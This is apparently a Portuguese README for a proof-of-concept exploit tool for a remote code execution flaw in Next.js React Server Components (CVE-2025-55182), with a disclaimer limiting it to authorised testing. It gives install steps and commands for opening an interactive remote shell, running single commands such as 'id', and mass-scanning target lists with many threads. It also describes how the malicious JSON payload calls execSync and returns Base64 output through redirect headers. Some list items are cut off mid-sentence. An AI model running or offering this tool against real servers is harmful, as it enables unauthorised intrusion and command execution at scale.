
Esta é uma ferramenta automatizada de Prova de Conceito (PoC) para a vulnerabilidade de execução remota de código (RCE) nos Next.js React Server Components (CVE-2025-55182).
A ferramenta integra Shell Interativo, Identificação Inteligente de Protocolo e Varredura em Lote Multithread, projetada para pesquisadores de segurança e testadores de penetração, com o objetivo de validar e explorar rapidamente esta vulnerabilidade.
⚠️ Aviso Legal: Esta ferramenta destina-se exclusivamente à educação em segurança cibernética e a testes de segurança autorizados. É estritamente proibido usá-la para qualquer ataque não autorizado. O usuário é o único responsável por todas as consequências legais decorrentes do uso desta ferramenta.
192.168.1.1, example.com ou URLs sem protocolo). A ferramenta tenta HTTPS primeiro; se falhar, volta automaticamente para HTTP.ls -F ou leitura de arquivos não textuais).base64 ou tr do sistema alvo (perfeitamente adaptado a ambientes de contêineres enxutos como Alpine/Distroless).Clonar o repositório:
git clone https://github.com/hualy13/CVE-2025-55182.git
cd CVE-2025-55182
Instalar as dependências:
pip install -r requirements.txt
Conecte-se ao alvo como se estivesse usando SSH, com suporte para execução contínua de comandos.
python CVE-2025-55182.py -u [https://target.com/apps] --shell
Nota: Se você inserir um IP (como 127.0.0.1), a ferramenta tentará automaticamente a conexão HTTPS primeiro.
Carregue uma lista de alvos de um arquivo de texto para verificação em lote.
Bash
python CVE-2025-55182.py -f targets.txt -t 20
-f: Caminho do arquivo de lista de alvos (um alvo por linha).-t: Número de threads de varredura (padrão: 10).success.txt no diretório atual.Executa um único comando e encerra, adequado para verificação rápida.
Bash
python CVE-2025-55182.py -u [https://target.com/apps] -c "id"
Suporta configuração de proxy HTTP/HTTPS (por exemplo, integração com o Burp Suite para análise de tráfego).
Bash
python CVE-2025-55182.py -u [https://target.com/apps] --shell -p [http://127.0.0.1:8080]
O arquivo targets.txt suporta formatos mistos; a ferramenta normaliza automaticamente:
Plaintext
192.168.1.100 # Tenta automaticamente [http://192.168.1.100]
10.0.0.5:3000 # Tenta automaticamente [http://10.0.0.5:3000]
example.com # Tenta [https://example.com] primeiro; se falhar, tenta http://
[https://site.com/apps] # Testado como está
A vulnerabilidade explora a desserialização insegura de payloads nas Server Actions do Next.js. Esta ferramenta constrói um payload JSON malicioso, cujo fluxo de execução é o seguinte:
child_process.execSync do Node.js.try-catch para evitar que comandos inexistentes ou erros de execução façam o servidor retornar erro 500 e travar.Buffer interno do Node.js para converter a saída da execução do comando em uma string Base64.X-Action-Redirect ou Location), exfiltrado para o atacante.As ferramentas e informações fornecidas neste repositório são exclusivamente para pesquisa de segurança e testes autorizados. Os autores não se responsabilizam por quaisquer ações ilegais ou danos decorrentes do uso indevido desta ferramenta.
Não teste nenhum sistema sem autorização explícita.